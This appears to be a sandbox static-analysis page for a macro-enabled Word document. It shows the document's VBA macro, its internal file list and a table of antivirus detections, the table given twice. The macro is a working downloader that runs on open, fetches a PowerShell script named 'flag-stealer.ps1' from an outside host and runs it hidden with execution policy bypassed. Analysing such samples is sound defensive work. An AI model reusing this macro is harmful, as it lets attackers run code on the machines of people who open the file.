Static | ZeroBOX

Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub AutoOpen() Dim strUrl As String Dim strFilePath As String Dim objXMLHttp As Object Dim objStream As Object Dim objShell As Object Dim objFile As Object ' Define URL and file path strUrl = "https://free-games-ua.s3.eu-central-1.amazonaws.com/flag-stealer.ps1" strFilePath = Environ("TEMP") & "\downloaded_script.ps1" ' Create XMLHTTP and download the file Set objXMLHttp = CreateObject("MSXML2.XMLHTTP") objXMLHttp.Open "GET", strUrl, False objXMLHttp.Send MsgBox "Status: " & objXMLHttp.Status If objXMLHttp.Status = 200 Then ' Use ADODB.Stream to write the file (more reliable) Set objFileSystem = CreateObject("Scripting.FileSystemObject") Set objFile = objFileSystem.CreateTextFile(strFilePath, True) objFile.Write objXMLHttp.responseText objFile.Close ' Run the PowerShell script silently Set objShell = CreateObject("WScript.Shell") objShell.Run "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File """ & strFilePath & """", 0, False ' Wait for script to finish (adjust delay if needed) Dim pauseTime As Date pauseTime = Now + TimeValue("00:00:05") Do While Now < pauseTime DoEvents Loop ' Delete the file (skip if in use) On Error Resume Next Kill strFilePath On Error GoTo 0 Else MsgBox "Download failed. HTTP Status: " & objXMLHttp.Status End If ' Cleanup Set objXMLHttp = Nothing Set objStream = Nothing Set objShell = Nothing End Sub

[Content_Types].xml

/L[E'9

_rels/.rels

word/document.xml

dpgxRhz

[.ksDr

word/_rels/document.xml.rels

X=c+(\

word/vbaProject.bin

`R^-&?

/&qoL1

L:iG:

5TCCA`

4Yi:(h

@&WSI+

@|8~G:

Q41LV.

ylVf~h

|r'-mo

X8\h^PW(

vv5oKgo

word/theme/theme1.xml

J52$4v

oY^Wq=O

J}\e*H

word/_rels/vbaProject.bin.relsl

-\Ya;>>

word/vbaData.xml

:b!#Fg

word/settings.xml

%bOM=JiY#A

|ZP!hyw

K&;{6,

i#.t%&

word/styles.xml

)0*?S`T~

#'7Jg]

J5.[rS

g.qcg!

word/webSettings.xml

:5Kc5Y

word/fontTable.xml

I2eC}l

docProps/core.xml

$[W~=i

docProps/app.xml

b*`?`BU8

[Content_Types].xmlPK

_rels/.relsPK

word/document.xmlPK

word/_rels/document.xml.relsPK

word/vbaProject.binPK

word/theme/theme1.xmlPK

word/_rels/vbaProject.bin.relsPK

word/vbaData.xmlPK

word/settings.xmlPK

word/styles.xmlPK

word/webSettings.xmlPK

word/fontTable.xmlPK

docProps/core.xmlPK

docProps/app.xmlPK

Antivirus	Signature
Lionic	Trojan.MSWord.PwShell.a!c
Elastic	malicious (high confidence)
ClamAV	Doc.Downloader.Powershell-10002004-0
CMC	Clean
CAT-QuickHeal	O97M.Dropper.AX
Skyhigh	Clean
ALYac	Clean
Malwarebytes	Clean
Zillya	Clean
Sangfor	Trojan.Generic-Macro.Save.f2707abd
CrowdStrike	Clean
Alibaba	TrojanDownloader:Script/modification.4d889f0f
K7GW	Clean
K7AntiVirus	Clean
huorong	OMacro/Downloader.il
Baidu	Clean
VirIT	W97M/Downloader.AE
Symantec	ISB.Dropper!gen1
ESET-NOD32	Clean
TrendMicro-HouseCall	TROJ_FRS.0NA104BO25
Avast	VBA:Downloader-FDK [Trj]
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	GT:VB.Heur2.PwShell.2.2BFB8634
NANO-Antivirus	Trojan.Ole2.Vbs-heuristic.druvzi
ViRobot	DOC.Z.Agent.21731
MicroWorld-eScan	GT:VB.Heur2.PwShell.2.2BFB8634
Tencent	Heur.Macro.Generic.a.eca8e0c5
Trustlook	Clean
Sophos	Clean
F-Secure	Trojan:W97M/MaliciousMacro.GEN
DrWeb	modification of W97M.Suspicious.1
VIPRE	GT:VB.Heur2.PwShell.2.2BFB8634
TrendMicro	TROJ_FRS.0NA104BO25
CTX	docx.downloader.w97m
Emsisoft	GT:VB.Heur2.PwShell.2.2BFB8634 (B)
Ikarus	GT.Trojan-Downloader.PS.Agent
FireEye	GT:VB.Heur2.PwShell.2.2BFB8634
Jiangmin	Clean
Webroot	Clean
Varist	PP97M/Downldr.GC.gen!Eldorado
Avira	HEUR/Macro.Downloader.ARIT.Gen
Fortinet	VBA/Dloader.FDK!tr
Antiy-AVL	Trojan[Downloader]/MSOffice.Agent
Kingsoft	Script.Trojan-Downloader.Generic.a
Gridinsoft	Clean
Xcitium	Clean
Arcabit	GT:VB.Heur2.PwShell.2.2BFB8634
SUPERAntiSpyware	Clean
Avast-Mobile	Clean
Microsoft	Clean
Google	Highly Suspicious
AhnLab-V3	Clean
Acronis	Clean
McAfee	Clean
TACHYON	Suspicious/WOX.DNL.Gen
VBA32	Clean
Zoner	Probably Heur.W97ShellS
Rising	Heur.Macro.powershell.a (CLASSIC)
Yandex	Clean
SentinelOne	Static AI - Malicious OPENXML
MaxSecure	Clean
GData	GT:VB.Heur2.PwShell.2.2BFB8634
AVG	VBA:Downloader-FDK [Trj]
Panda	Clean
alibabacloud	Trojan[downloader]:MSOffice/Heur2.PrKycQR

Antivirus

Signature

Lionic

Trojan.MSWord.PwShell.a!c

Elastic

malicious (high confidence)

ClamAV

Doc.Downloader.Powershell-10002004-0

CMC

Clean

CAT-QuickHeal

O97M.Dropper.AX

Skyhigh

Clean

ALYac

Clean

Malwarebytes

Clean

Zillya

Clean

Sangfor

Trojan.Generic-Macro.Save.f2707abd

CrowdStrike

Clean

Alibaba

TrojanDownloader:Script/modification.4d889f0f

K7GW

Clean

K7AntiVirus

Clean

huorong

OMacro/Downloader.il

Baidu

Clean

VirIT

W97M/Downloader.AE

Symantec

ISB.Dropper!gen1

ESET-NOD32

Clean

TrendMicro-HouseCall

TROJ_FRS.0NA104BO25

Avast

VBA:Downloader-FDK [Trj]

Cynet

Malicious (score: 99)

Kaspersky

HEUR:Trojan-Downloader.Script.Generic

BitDefender

GT:VB.Heur2.PwShell.2.2BFB8634

NANO-Antivirus

Trojan.Ole2.Vbs-heuristic.druvzi

ViRobot

DOC.Z.Agent.21731

MicroWorld-eScan

GT:VB.Heur2.PwShell.2.2BFB8634

Tencent

Heur.Macro.Generic.a.eca8e0c5

Trustlook

Clean

Sophos

Clean

F-Secure

Trojan:W97M/MaliciousMacro.GEN

DrWeb

modification of W97M.Suspicious.1

VIPRE

GT:VB.Heur2.PwShell.2.2BFB8634

TrendMicro

TROJ_FRS.0NA104BO25

CTX

docx.downloader.w97m

Emsisoft

GT:VB.Heur2.PwShell.2.2BFB8634 (B)

Ikarus

GT.Trojan-Downloader.PS.Agent

FireEye

GT:VB.Heur2.PwShell.2.2BFB8634

Jiangmin

Clean

Webroot

Clean

Varist

PP97M/Downldr.GC.gen!Eldorado

Avira

HEUR/Macro.Downloader.ARIT.Gen

Fortinet

VBA/Dloader.FDK!tr

Antiy-AVL

Trojan[Downloader]/MSOffice.Agent

Kingsoft

Script.Trojan-Downloader.Generic.a

Gridinsoft

Clean

Xcitium

Clean

Arcabit

GT:VB.Heur2.PwShell.2.2BFB8634

SUPERAntiSpyware

Clean

Avast-Mobile

Clean

Microsoft

Clean

Google

Highly Suspicious

AhnLab-V3

Clean

Acronis

Clean

McAfee

Clean

TACHYON

Suspicious/WOX.DNL.Gen

VBA32

Clean

Zoner

Probably Heur.W97ShellS

Rising

Heur.Macro.powershell.a (CLASSIC)

Yandex

Clean

SentinelOne

Static AI - Malicious OPENXML

MaxSecure

Clean

GData

GT:VB.Heur2.PwShell.2.2BFB8634

AVG

VBA:Downloader-FDK [Trj]

Panda

Clean

alibabacloud

Trojan[downloader]:MSOffice/Heur2.PrKycQR

Static Analysis

Original

Deobfuscated